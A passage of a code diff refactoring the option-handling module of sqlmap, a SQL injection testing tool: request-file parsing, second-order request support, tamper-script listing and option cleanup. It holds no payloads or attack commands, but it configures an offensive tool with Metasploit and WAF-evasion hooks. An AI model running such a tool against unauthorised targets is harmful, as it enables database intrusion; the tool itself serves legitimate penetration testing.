|
|
||||||
addedTargetUrls.add(url)
|
|
||||||
|
|
||||||
checkFile(reqFile)
|
|
||||||
try:
|
|
||||||
with openFile(reqFile, "rb") as f:
|
|
||||||
content = f.read()
|
|
||||||
except (IOError, OSError, MemoryError), ex:
|
|
||||||
errMsg = "something went wrong while trying "
|
|
||||||
errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex))
|
|
||||||
raise SqlmapSystemException(errMsg)
|
|
||||||
|
|
||||||
if conf.scope:
|
|
||||||
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
|
|
||||||
|
|
||||||
_parseBurpLog(content)
|
|
||||||
_parseWebScarabLog(content)
|
|
||||||
|
|
||||||
if not addedTargetUrls:
|
|
||||||
errMsg = "unable to find usable request(s) "
|
|
||||||
errMsg += "in provided file ('%s')" % reqFile
|
|
||||||
raise SqlmapGenericException(errMsg)
|
|
||||||
|
|
||||||
def _loadQueries():
|
def _loadQueries():
|
||||||
"""
|
"""
|
||||||
Loads queries from 'xml/queries.xml' file.
|
Loads queries from 'xml/queries.xml' file.
|
||||||
@@ -402,7 +199,7 @@ def _loadQueries():
|
|||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
|
|
||||||
for node in tree.findall("*"):
|
for node in tree.findall("*"):
|
||||||
queries[node.attrib['value']] = iterate(node)
|
queries[node.attrib['value']] = iterate(node)
|
||||||
@@ -414,7 +211,7 @@ def _setMultipleTargets():
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
initialTargetsCount = len(kb.targets)
|
initialTargetsCount = len(kb.targets)
|
||||||
addedTargetUrls = set()
|
seen = set()
|
||||||
|
|
||||||
if not conf.logFile:
|
if not conf.logFile:
|
||||||
return
|
return
|
||||||
@@ -427,17 +224,25 @@ def _setMultipleTargets():
|
|||||||
raise SqlmapFilePathException(errMsg)
|
raise SqlmapFilePathException(errMsg)
|
||||||
|
|
||||||
if os.path.isfile(conf.logFile):
|
if os.path.isfile(conf.logFile):
|
||||||
_feedTargetsDict(conf.logFile, addedTargetUrls)
|
for target in parseRequestFile(conf.logFile):
|
||||||
|
url = target[0]
|
||||||
|
if url not in seen:
|
||||||
|
kb.targets.add(target)
|
||||||
|
seen.add(url)
|
||||||
|
|
||||||
elif os.path.isdir(conf.logFile):
|
elif os.path.isdir(conf.logFile):
|
||||||
files = os.listdir(conf.logFile)
|
files = os.listdir(conf.logFile)
|
||||||
files.sort()
|
files.sort()
|
||||||
|
|
||||||
for reqFile in files:
|
for reqFile in files:
|
||||||
if not re.search("([\d]+)\-request", reqFile):
|
if not re.search(r"([\d]+)\-request", reqFile):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
_feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls)
|
for target in parseRequestFile(os.path.join(conf.logFile, reqFile)):
|
||||||
|
url = target[0]
|
||||||
|
if url not in seen:
|
||||||
|
kb.targets.add(target)
|
||||||
|
seen.add(url)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
errMsg = "the specified list of targets is not a file "
|
errMsg = "the specified list of targets is not a file "
|
||||||
@@ -478,22 +283,37 @@ def _setRequestFromFile():
|
|||||||
textual file, parses it and saves the information into the knowledge base.
|
textual file, parses it and saves the information into the knowledge base.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.requestFile:
|
if conf.requestFile:
|
||||||
return
|
conf.requestFile = safeExpandUser(conf.requestFile)
|
||||||
|
seen = set()
|
||||||
|
|
||||||
addedTargetUrls = set()
|
if not os.path.isfile(conf.requestFile):
|
||||||
|
errMsg = "specified HTTP request file '%s' " % conf.requestFile
|
||||||
|
errMsg += "does not exist"
|
||||||
|
raise SqlmapFilePathException(errMsg)
|
||||||
|
|
||||||
conf.requestFile = safeExpandUser(conf.requestFile)
|
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if not os.path.isfile(conf.requestFile):
|
for target in parseRequestFile(conf.requestFile):
|
||||||
errMsg = "specified HTTP request file '%s' " % conf.requestFile
|
url = target[0]
|
||||||
errMsg += "does not exist"
|
if url not in seen:
|
||||||
raise SqlmapFilePathException(errMsg)
|
kb.targets.add(target)
|
||||||
|
seen.add(url)
|
||||||
|
|
||||||
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
|
if conf.secondReq:
|
||||||
logger.info(infoMsg)
|
conf.secondReq = safeExpandUser(conf.secondReq)
|
||||||
|
|
||||||
_feedTargetsDict(conf.requestFile, addedTargetUrls)
|
if not os.path.isfile(conf.secondReq):
|
||||||
|
errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq
|
||||||
|
errMsg += "does not exist"
|
||||||
|
raise SqlmapFilePathException(errMsg)
|
||||||
|
|
||||||
|
infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
target = parseRequestFile(conf.secondReq, False).next()
|
||||||
|
kb.secondReq = target
|
||||||
|
|
||||||
def _setCrawler():
|
def _setCrawler():
|
||||||
if not conf.crawlDepth:
|
if not conf.crawlDepth:
|
||||||
@@ -666,7 +486,7 @@ def _setDBMSAuthentication():
|
|||||||
debugMsg = "setting the DBMS authentication credentials"
|
debugMsg = "setting the DBMS authentication credentials"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
match = re.search("^(.+?):(.*?)$", conf.dbmsCred)
|
match = re.search(r"^(.+?):(.*?)$", conf.dbmsCred)
|
||||||
|
|
||||||
if not match:
|
if not match:
|
||||||
errMsg = "DBMS authentication credentials value must be in format "
|
errMsg = "DBMS authentication credentials value must be in format "
|
||||||
@@ -687,12 +507,12 @@ def _setMetasploit():
|
|||||||
|
|
||||||
if IS_WIN:
|
if IS_WIN:
|
||||||
try:
|
try:
|
||||||
import win32file
|
__import__("win32file")
|
||||||
except ImportError:
|
except ImportError:
|
||||||
errMsg = "sqlmap requires third-party module 'pywin32' "
|
errMsg = "sqlmap requires third-party module 'pywin32' "
|
||||||
errMsg += "in order to use Metasploit functionalities on "
|
errMsg += "in order to use Metasploit functionalities on "
|
||||||
errMsg += "Windows. You can download it from "
|
errMsg += "Windows. You can download it from "
|
||||||
errMsg += "'http://sourceforge.net/projects/pywin32/files/pywin32/'"
|
errMsg += "'https://sourceforge.net/projects/pywin32/files/pywin32/'"
|
||||||
raise SqlmapMissingDependence(errMsg)
|
raise SqlmapMissingDependence(errMsg)
|
||||||
|
|
||||||
if not conf.msfPath:
|
if not conf.msfPath:
|
||||||
@@ -700,7 +520,7 @@ def _setMetasploit():
|
|||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
|
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
|
||||||
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
|
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
|
||||||
_ = OpenKey(_, key)
|
_ = OpenKey(_, key)
|
||||||
retVal = QueryValueEx(_, value)[0]
|
retVal = QueryValueEx(_, value)[0]
|
||||||
@@ -784,7 +604,7 @@ def _setMetasploit():
|
|||||||
|
|
||||||
if not msfEnvPathExists:
|
if not msfEnvPathExists:
|
||||||
errMsg = "unable to locate Metasploit Framework installation. "
|
errMsg = "unable to locate Metasploit Framework installation. "
|
||||||
errMsg += "You can get it at 'http://www.metasploit.com/download/'"
|
errMsg += "You can get it at 'https://www.metasploit.com/download/'"
|
||||||
raise SqlmapFilePathException(errMsg)
|
raise SqlmapFilePathException(errMsg)
|
||||||
|
|
||||||
def _setWriteFile():
|
def _setWriteFile():
|
||||||
@@ -861,7 +681,7 @@ def _setDBMS():
|
|||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
conf.dbms = conf.dbms.lower()
|
conf.dbms = conf.dbms.lower()
|
||||||
regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
|
regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
|
||||||
|
|
||||||
if regex:
|
if regex:
|
||||||
conf.dbms = regex.group(1)
|
conf.dbms = regex.group(1)
|
||||||
@@ -880,6 +700,22 @@ def _setDBMS():
|
|||||||
|
|
||||||
break
|
break
|
||||||
|
|
||||||
|
def _listTamperingFunctions():
|
||||||
|
"""
|
||||||
|
Lists available tamper functions
|
||||||
|
"""
|
||||||
|
|
||||||
|
if conf.listTampers:
|
||||||
|
infoMsg = "listing available tamper scripts\n"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
|
||||||
|
content = openFile(script, "rb").read()
|
||||||
|
match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
|
||||||
|
if match:
|
||||||
|
comment = match.group(1).strip()
|
||||||
|
dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip())))
|
||||||
|
|
||||||
def _setTamperingFunctions():
|
def _setTamperingFunctions():
|
||||||
"""
|
"""
|
||||||
Loads tampering functions from given script(s)
|
Loads tampering functions from given script(s)
|
||||||
@@ -918,7 +754,7 @@ def _setTamperingFunctions():
|
|||||||
dirname, filename = os.path.split(script)
|
dirname, filename = os.path.split(script)
|
||||||
dirname = os.path.abspath(dirname)
|
dirname = os.path.abspath(dirname)
|
||||||
|
|
||||||
infoMsg = "loading tamper script '%s'" % filename[:-3]
|
infoMsg = "loading tamper module '%s'" % filename[:-3]
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if not os.path.exists(os.path.join(dirname, "__init__.py")):
|
if not os.path.exists(os.path.join(dirname, "__init__.py")):
|
||||||
@@ -931,8 +767,8 @@ def _setTamperingFunctions():
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
|
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||||
except (ImportError, SyntaxError), ex:
|
except Exception, ex:
|
||||||
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
|
raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
|
||||||
|
|
||||||
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
|
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
|
||||||
|
|
||||||
@@ -962,7 +798,12 @@ def _setTamperingFunctions():
|
|||||||
|
|
||||||
break
|
break
|
||||||
elif name == "dependencies":
|
elif name == "dependencies":
|
||||||
function()
|
try:
|
||||||
|
function()
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "error occurred while checking dependencies "
|
||||||
|
errMsg += "for tamper module '%s' ('%s')" % (filename[:-3], getSafeExString(ex))
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if not found:
|
if not found:
|
||||||
errMsg = "missing function 'tamper(payload, **kwargs)' "
|
errMsg = "missing function 'tamper(payload, **kwargs)' "
|
||||||
@@ -1046,7 +887,7 @@ def _setSocketPreConnect():
|
|||||||
if conf.disablePrecon:
|
if conf.disablePrecon:
|
||||||
return
|
return
|
||||||
|
|
||||||
def _():
|
def _thread():
|
||||||
while kb.get("threadContinue") and not conf.get("disablePrecon"):
|
while kb.get("threadContinue") and not conf.get("disablePrecon"):
|
||||||
try:
|
try:
|
||||||
for key in socket._ready:
|
for key in socket._ready:
|
||||||
@@ -1078,6 +919,7 @@ def _setSocketPreConnect():
|
|||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
|
candidate.shutdown(socket.SHUT_RDWR)
|
||||||
candidate.close()
|
candidate.close()
|
||||||
except socket.error:
|
except socket.error:
|
||||||
pass
|
pass
|
||||||
@@ -1090,7 +932,7 @@ def _setSocketPreConnect():
|
|||||||
socket.socket._connect = socket.socket.connect
|
socket.socket._connect = socket.socket.connect
|
||||||
socket.socket.connect = connect
|
socket.socket.connect = connect
|
||||||
|
|
||||||
thread = threading.Thread(target=_)
|
thread = threading.Thread(target=_thread)
|
||||||
setDaemon(thread)
|
setDaemon(thread)
|
||||||
thread.start()
|
thread.start()
|
||||||
|
|
||||||
@@ -1127,7 +969,7 @@ def _setHTTPHandlers():
|
|||||||
_ = urlparse.urlsplit(conf.proxy)
|
_ = urlparse.urlsplit(conf.proxy)
|
||||||
except Exception, ex:
|
except Exception, ex:
|
||||||
errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
|
errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
|
||||||
raise SqlmapSyntaxException, errMsg
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
hostnamePort = _.netloc.split(":")
|
hostnamePort = _.netloc.split(":")
|
||||||
|
|
||||||
@@ -1148,7 +990,7 @@ def _setHTTPHandlers():
|
|||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.proxyCred:
|
if conf.proxyCred:
|
||||||
_ = re.search("^(.*?):(.*?)$", conf.proxyCred)
|
_ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred)
|
||||||
if not _:
|
if not _:
|
||||||
errMsg = "proxy authentication credentials "
|
errMsg = "proxy authentication credentials "
|
||||||
errMsg += "value must be in format username:password"
|
errMsg += "value must be in format username:password"
|
||||||
@@ -1254,9 +1096,9 @@ def _setSafeVisit():
|
|||||||
kb.safeReq.post = None
|
kb.safeReq.post = None
|
||||||
else:
|
else:
|
||||||
errMsg = "invalid format of a safe request file"
|
errMsg = "invalid format of a safe request file"
|
||||||
raise SqlmapSyntaxException, errMsg
|
raise SqlmapSyntaxException(errMsg)
|
||||||
else:
|
else:
|
||||||
if not re.search("^http[s]*://", conf.safeUrl):
|
if not re.search(r"\Ahttp[s]*://", conf.safeUrl):
|
||||||
if ":443/" in conf.safeUrl:
|
if ":443/" in conf.safeUrl:
|
||||||
conf.safeUrl = "https://" + conf.safeUrl
|
conf.safeUrl = "https://" + conf.safeUrl
|
||||||
else:
|
else:
|
||||||
@@ -1376,7 +1218,7 @@ def _setHTTPAuthentication():
|
|||||||
except ImportError:
|
except ImportError:
|
||||||
errMsg = "sqlmap requires Python NTLM third-party library "
|
errMsg = "sqlmap requires Python NTLM third-party library "
|
||||||
errMsg += "in order to authenticate via NTLM, "
|
errMsg += "in order to authenticate via NTLM, "
|
||||||
errMsg += "http://code.google.com/p/python-ntlm/"
|
errMsg += "https://github.com/mullender/python-ntlm"
|
||||||
raise SqlmapMissingDependence(errMsg)
|
raise SqlmapMissingDependence(errMsg)
|
||||||
|
|
||||||
authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
|
authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
|
||||||
@@ -1409,8 +1251,8 @@ def _setHTTPExtraHeaders():
|
|||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
|
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
|
||||||
if conf.charset:
|
if conf.encoding:
|
||||||
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
|
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding))
|
||||||
|
|
||||||
# Invalidating any caching mechanism in between
|
# Invalidating any caching mechanism in between
|
||||||
# Reference: http://stackoverflow.com/a/1383359
|
# Reference: http://stackoverflow.com/a/1383359
|
||||||
@@ -1488,8 +1330,8 @@ def _setHTTPUserAgent():
|
|||||||
|
|
||||||
userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0]
|
userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0]
|
||||||
|
|
||||||
infoMsg = "fetched random HTTP User-Agent header from "
|
infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent
|
||||||
infoMsg += "file '%s': '%s'" % (paths.USER_AGENTS, userAgent)
|
infoMsg += "file '%s'" % paths.USER_AGENTS
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
|
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
|
||||||
@@ -1579,12 +1421,12 @@ def _createTemporaryDirectory():
|
|||||||
except (OSError, IOError), ex:
|
except (OSError, IOError), ex:
|
||||||
errMsg = "there has been a problem while accessing "
|
errMsg = "there has been a problem while accessing "
|
||||||
errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
|
errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
if not os.path.isdir(tempfile.gettempdir()):
|
if not os.path.isdir(tempfile.gettempdir()):
|
||||||
os.makedirs(tempfile.gettempdir())
|
os.makedirs(tempfile.gettempdir())
|
||||||
except (OSError, IOError, WindowsError), ex:
|
except Exception, ex:
|
||||||
warnMsg = "there has been a problem while accessing "
|
warnMsg = "there has been a problem while accessing "
|
||||||
warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
|
warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
|
||||||
warnMsg += "make sure that there is enough disk space left. If problem persists, "
|
warnMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
@@ -1595,7 +1437,7 @@ def _createTemporaryDirectory():
|
|||||||
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
|
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
|
||||||
try:
|
try:
|
||||||
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
|
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
|
||||||
except (OSError, IOError, WindowsError):
|
except:
|
||||||
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
|
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
|
||||||
|
|
||||||
kb.tempDir = tempfile.tempdir
|
kb.tempDir = tempfile.tempdir
|
||||||
@@ -1603,10 +1445,10 @@ def _createTemporaryDirectory():
|
|||||||
if not os.path.isdir(tempfile.tempdir):
|
if not os.path.isdir(tempfile.tempdir):
|
||||||
try:
|
try:
|
||||||
os.makedirs(tempfile.tempdir)
|
os.makedirs(tempfile.tempdir)
|
||||||
except (OSError, IOError, WindowsError), ex:
|
except Exception, ex:
|
||||||
errMsg = "there has been a problem while setting "
|
errMsg = "there has been a problem while setting "
|
||||||
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
|
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def _cleanupOptions():
|
def _cleanupOptions():
|
||||||
"""
|
"""
|
||||||
@@ -1647,7 +1489,10 @@ def _cleanupOptions():
|
|||||||
conf.rParam = []
|
conf.rParam = []
|
||||||
|
|
||||||
if conf.paramDel and '\\' in conf.paramDel:
|
if conf.paramDel and '\\' in conf.paramDel:
|
||||||
conf.paramDel = conf.paramDel.decode("string_escape")
|
try:
|
||||||
|
conf.paramDel = conf.paramDel.decode("string_escape")
|
||||||
|
except ValueError:
|
||||||
|
pass
|
||||||
|
|
||||||
if conf.skip:
|
if conf.skip:
|
||||||
conf.skip = conf.skip.replace(" ", "")
|
conf.skip = conf.skip.replace(" ", "")
|
||||||
@@ -1661,6 +1506,9 @@ def _cleanupOptions():
|
|||||||
if conf.delay:
|
if conf.delay:
|
||||||
conf.delay = float(conf.delay)
|
conf.delay = float(conf.delay)
|
||||||
|
|
||||||
|
if conf.url:
|
||||||
|
conf.url = conf.url.strip()
|
||||||
|
|
||||||
if conf.rFile:
|
if conf.rFile:
|
||||||
conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile))
|
conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile))
|
||||||
|
|
||||||
@@ -1696,12 +1544,21 @@ def _cleanupOptions():
|
|||||||
if conf.os:
|
if conf.os:
|
||||||
conf.os = conf.os.capitalize()
|
conf.os = conf.os.capitalize()
|
||||||
|
|
||||||
|
if conf.forceDbms:
|
||||||
|
conf.dbms = conf.forceDbms
|
||||||
|
|
||||||
if conf.dbms:
|
if conf.dbms:
|
||||||
conf.dbms = conf.dbms.capitalize()
|
kb.dbmsFilter = []
|
||||||
|
for _ in conf.dbms.split(','):
|
||||||
|
for dbms, aliases in DBMS_ALIASES:
|
||||||
|
if _.strip().lower() in aliases:
|
||||||
|
kb.dbmsFilter.append(dbms)
|
||||||
|
conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
|
||||||
|
break
|
||||||
|
|
||||||
if conf.testFilter:
|
if conf.testFilter:
|
||||||
conf.testFilter = conf.testFilter.strip('*+')
|
conf.testFilter = conf.testFilter.strip('*+')
|
||||||
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
|
conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
re.compile(conf.testFilter)
|
re.compile(conf.testFilter)
|
||||||
@@ -1710,7 +1567,7 @@ def _cleanupOptions():
|
|||||||
|
|
||||||
if conf.testSkip:
|
if conf.testSkip:
|
||||||
conf.testSkip = conf.testSkip.strip('*+')
|
conf.testSkip = conf.testSkip.strip('*+')
|
||||||
conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
|
conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
re.compile(conf.testSkip)
|
re.compile(conf.testSkip)
|
||||||
@@ -1757,7 +1614,7 @@ def _cleanupOptions():
|
|||||||
conf.string = conf.string.replace(_.encode("string_escape"), _)
|
conf.string = conf.string.replace(_.encode("string_escape"), _)
|
||||||
|
|
||||||
if conf.getAll:
|
if conf.getAll:
|
||||||
map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
|
map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)
|
||||||
|
|
||||||
if conf.noCast:
|
if conf.noCast:
|
||||||
for _ in DUMP_REPLACEMENTS.keys():
|
for _ in DUMP_REPLACEMENTS.keys():
|
||||||
@@ -1772,8 +1629,8 @@ def _cleanupOptions():
|
|||||||
if conf.col:
|
if conf.col:
|
||||||
conf.col = re.sub(r"\s*,\s*", ',', conf.col)
|
conf.col = re.sub(r"\s*,\s*", ',', conf.col)
|
||||||
|
|
||||||
if conf.excludeCol:
|
if conf.exclude:
|
||||||
conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol)
|
conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude)
|
||||||
|
|
||||||
if conf.binaryFields:
|
if conf.binaryFields:
|
||||||
conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)
|
conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)
|
||||||
@@ -1781,6 +1638,9 @@ def _cleanupOptions():
|
|||||||
if any((conf.proxy, conf.proxyFile, conf.tor)):
|
if any((conf.proxy, conf.proxyFile, conf.tor)):
|
||||||
conf.disablePrecon = True
|
conf.disablePrecon = True
|
||||||
|
|
||||||
|
if conf.dummy:
|
||||||
|
conf.batch = True
|
||||||
|
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
threadData.reset()
|
threadData.reset()
|
||||||
|
|
||||||
@@ -1795,23 +1655,13 @@ def _cleanupEnvironment():
|
|||||||
if hasattr(socket, "_ready"):
|
if hasattr(socket, "_ready"):
|
||||||
socket._ready.clear()
|
socket._ready.clear()
|
||||||
|
|
||||||
def _dirtyPatches():
|
def _purge():
|
||||||
"""
|
"""
|
||||||
Place for "dirty" Python related patches
|
Safely removes (purges) sqlmap data directory.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses)
|
if conf.purge:
|
||||||
|
purge(paths.SQLMAP_HOME_PATH)
|
||||||
if IS_WIN:
|
|
||||||
from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS
|
|
||||||
|
|
||||||
def _purgeOutput():
|
|
||||||
"""
|
|
||||||
Safely removes (purges) output directory.
|
|
||||||
"""
|
|
||||||
|
|
||||||
if conf.purgeOutput:
|
|
||||||
purge(paths.SQLMAP_OUTPUT_PATH)
|
|
||||||
|
|
||||||
def _setConfAttributes():
|
def _setConfAttributes():
|
||||||
"""
|
"""
|
||||||
@@ -1877,6 +1727,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||||||
kb.cache.addrinfo = {}
|
kb.cache.addrinfo = {}
|
||||||
kb.cache.content = {}
|
kb.cache.content = {}
|
||||||
kb.cache.encoding = {}
|
kb.cache.encoding = {}
|
||||||
|
kb.cache.alphaBoundaries = None
|
||||||
kb.cache.intBoundaries = None
|
kb.cache.intBoundaries = None
|
||||||
kb.cache.parsedDbms = {}
|
kb.cache.parsedDbms = {}
|
||||||
kb.cache.regex = {}
|
kb.cache.regex = {}
|
||||||
@@ -1902,6 +1753,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||||||
|
|
||||||
# Active back-end DBMS fingerprint
|
# Active back-end DBMS fingerprint
|
||||||
kb.dbms = None
|
kb.dbms = None
|
||||||
|
kb.dbmsFilter = []
|
||||||
kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
||||||
|
|
||||||
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
|
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
|
||||||
@@ -1927,6 +1779,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||||||
kb.forcePartialUnion = False
|
kb.forcePartialUnion = False
|
||||||
kb.forceWhere = None
|
kb.forceWhere = None
|
||||||
kb.futileUnion = None
|
kb.futileUnion = None
|
||||||
|
kb.heavilyDynamic = False
|
||||||
kb.headersFp = {}
|
kb.headersFp = {}
|
||||||
kb.heuristicDbms = None
|
kb.heuristicDbms = None
|
||||||
kb.heuristicExtendedDbms = None
|
kb.heuristicExtendedDbms = None
|
||||||
@@ -1998,6 +1851,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||||||
kb.rowXmlMode = False
|
kb.rowXmlMode = False
|
||||||
kb.safeCharEncode = False
|
kb.safeCharEncode = False
|
||||||
kb.safeReq = AttribDict()
|
kb.safeReq = AttribDict()
|
||||||
|
kb.secondReq = None
|
||||||
kb.singleLogFlags = set()
|
kb.singleLogFlags = set()
|
||||||
kb.skipSeqMatcher = False
|
kb.skipSeqMatcher = False
|
||||||
kb.reduceTests = None
|
kb.reduceTests = None
|
||||||
@@ -2020,6 +1874,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||||||
kb.uChar = NULL
|
kb.uChar = NULL
|
||||||
kb.unionDuplicates = False
|
kb.unionDuplicates = False
|
||||||
kb.wafSpecificResponse = None
|
kb.wafSpecificResponse = None
|
||||||
|
kb.wizardMode = False
|
||||||
kb.xpCmdshellAvailable = False
|
kb.xpCmdshellAvailable = False
|
||||||
|
|
||||||
if flushAll:
|
if flushAll:
|
||||||
@@ -2087,11 +1942,11 @@ def _useWizardInterface():
|
|||||||
choice = readInput(message, default='1')
|
choice = readInput(message, default='1')
|
||||||
|
|
||||||
if choice == '2':
|
if choice == '2':
|
||||||
map(lambda x: conf.__setitem__(x, True), WIZARD.INTERMEDIATE)
|
map(lambda _: conf.__setitem__(_, True), WIZARD.INTERMEDIATE)
|
||||||
elif choice == '3':
|
elif choice == '3':
|
||||||
map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
|
map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)
|
||||||
else:
|
else:
|
||||||
map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC)
|
map(lambda _: conf.__setitem__(_, True), WIZARD.BASIC)
|
||||||
|
|
||||||
logger.debug("muting sqlmap.. it will do the magic for you")
|
logger.debug("muting sqlmap.. it will do the magic for you")
|
||||||
conf.verbose = 0
|
conf.verbose = 0
|
||||||
